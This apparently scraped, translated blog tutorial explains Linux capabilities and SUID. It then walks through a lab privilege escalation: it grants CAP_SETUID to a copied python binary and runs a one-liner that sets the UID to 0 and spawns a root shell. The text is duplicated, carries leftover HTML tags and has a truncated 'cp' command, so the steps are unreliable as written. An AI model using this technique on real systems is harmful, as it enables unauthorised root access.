Capabilities Introduction
What are Capabilities in Linux
Before we got capabilities, we only had a binary system of privileged and unprivileged processes, and for the purpose of performing permission checks, traditional UNIX implementations divided processes into two categories: privileged processes (called superuser or root) and unprivileged processes (whose effective UID is non-zero).
Capabilities are those permissions that divide the privileges of a kernel user or kernel-level program into small pieces so that a process can be given enough capabilities to perform a specific privileged task.
Difference between Capabilities and SUIDSUID
: SUID stands for Set User ID and allows the user to execute a file as the owner of the file. This is defined as giving a user temporary permission to run a program/file under the permissions of the file owner instead of running it as the file owner. This can be easily detected using the "find" command. To find all files with SUID set in the current directory, we can use the -perm option, which will print only files with permissions set to 4000 (allowing a process to temporarily execute with root privileges)
Command to give temporary permissions to a file
Example:
<span>chmod</span> u+s /usr/bin/python<br>
Use the find command to find SUID filesfind
/ -perm -u=s -type f <span>2</span>><span>/dev/</span><span>null</span><br>
Detailed explanation of setcap: Detailed explanation of setcap - Farmer Operation and Maintenance - Blog Park
setcap brief description:
The main idea of Capabilities is to divide the privileges of the root user, that is, to divide the privileges of the root into different capabilities, each capability represents a certain privileged operation. For example: the capability <span>CAP_SYS_MODULE</span> indicates that the user can load (or unload) the privileged operation of the kernel module, and <span>CAP_SETUID</span> indicates that the user can modify the privileged operation of the process user identity. In Capbilities, the system will perform access control for privileged operations based on the capabilities of the process. <br>
getcap: Retrieve the file set by setcap
getcap -r / <span>2</span>><span>/dev/</span><span>null</span><br>
OS: kali<br>Test users: root, <span>test</span><br>
First use the root user to give python SUID
<span>chmod</span> u+s /usr/bin/python<br>
Find a wave of files with corresponding SUID permissions to determine whether they are successfully given
find / -perm -u=s -type f <span>2</span>><span>/dev/</span><span>null</span><br>
Copy python to the /tmp directory, and imitate the structure similar to the article
<span>cp</span> /usr/bin/python<br>
setcap gives the python in the tmp directory a temporary execution permission for the user
<span>setcap</span> CAP_SETUID+ep /tmp/python<br>
Switch to user test and execute the following command to obtain root privileges
: <span>getcap</span> -r / 2>/dev/null <span>#Query the files that are granted privileges</span><br>
./python -c <span>'import os;os.setuid(0);os.system("/bin/bash")'</span><br>
getcap -r / 2>/dev/null #Query the files that are granted CAP_SETUID permission to determine whether some files are worth using. Currently, several files that can be used are obtained:
<span>perl</span><br>python<br>tar
What are Capabilities in Linux
Before we got capabilities, we only had a binary system of privileged and unprivileged processes, and for the purpose of performing permission checks, traditional UNIX implementations divided processes into two categories: privileged processes (called superuser or root) and unprivileged processes (whose effective UID is non-zero).
Capabilities are those permissions that divide the privileges of a kernel user or kernel-level program into small pieces so that a process can be given enough capabilities to perform a specific privileged task.
Difference between Capabilities and SUIDSUID
: SUID stands for Set User ID and allows the user to execute a file as the owner of the file. This is defined as giving a user temporary permission to run a program/file under the permissions of the file owner instead of running it as the file owner. This can be easily detected using the "find" command. To find all files with SUID set in the current directory, we can use the -perm option, which will print only files with permissions set to 4000 (allowing a process to temporarily execute with root privileges)
Command to give temporary permissions to a file
Example:
<span>chmod</span> u+s /usr/bin/python<br>
Use the find command to find SUID filesfind
/ -perm -u=s -type f <span>2</span>><span>/dev/</span><span>null</span><br>
Detailed explanation of setcap: Detailed explanation of setcap - Farmer Operation and Maintenance - Blog Park
setcap brief description:
The main idea of Capabilities is to divide the privileges of the root user, that is, to divide the privileges of the root into different capabilities, each capability represents a certain privileged operation. For example: the capability <span>CAP_SYS_MODULE</span> indicates that the user can load (or unload) the privileged operation of the kernel module, and <span>CAP_SETUID</span> indicates that the user can modify the privileged operation of the process user identity. In Capbilities, the system will perform access control for privileged operations based on the capabilities of the process. <br>
getcap: Retrieve the file set by setcap
getcap -r / <span>2</span>><span>/dev/</span><span>null</span><br>
OS: kali<br>Test users: root, <span>test</span><br>
First use the root user to give python SUID
<span>chmod</span> u+s /usr/bin/python<br>
Find a wave of files with corresponding SUID permissions to determine whether they are successfully given
find / -perm -u=s -type f <span>2</span>><span>/dev/</span><span>null</span><br>
Copy python to the /tmp directory, and imitate the structure similar to the article
<span>cp</span> /usr/bin/python<br>
setcap gives the python in the tmp directory a temporary execution permission for the user
<span>setcap</span> CAP_SETUID+ep /tmp/python<br>
Switch to user test and execute the following command to obtain root privileges
: <span>getcap</span> -r / 2>/dev/null <span>#Query the files that are granted privileges</span><br>
./python -c <span>'import os;os.setuid(0);os.system("/bin/bash")'</span><br>
- 1
getcap -r / 2>/dev/null #Query the files that are granted CAP_SETUID permission to determine whether some files are worth using. Currently, several files that can be used are obtained:
<span>perl</span><br>python<br>tar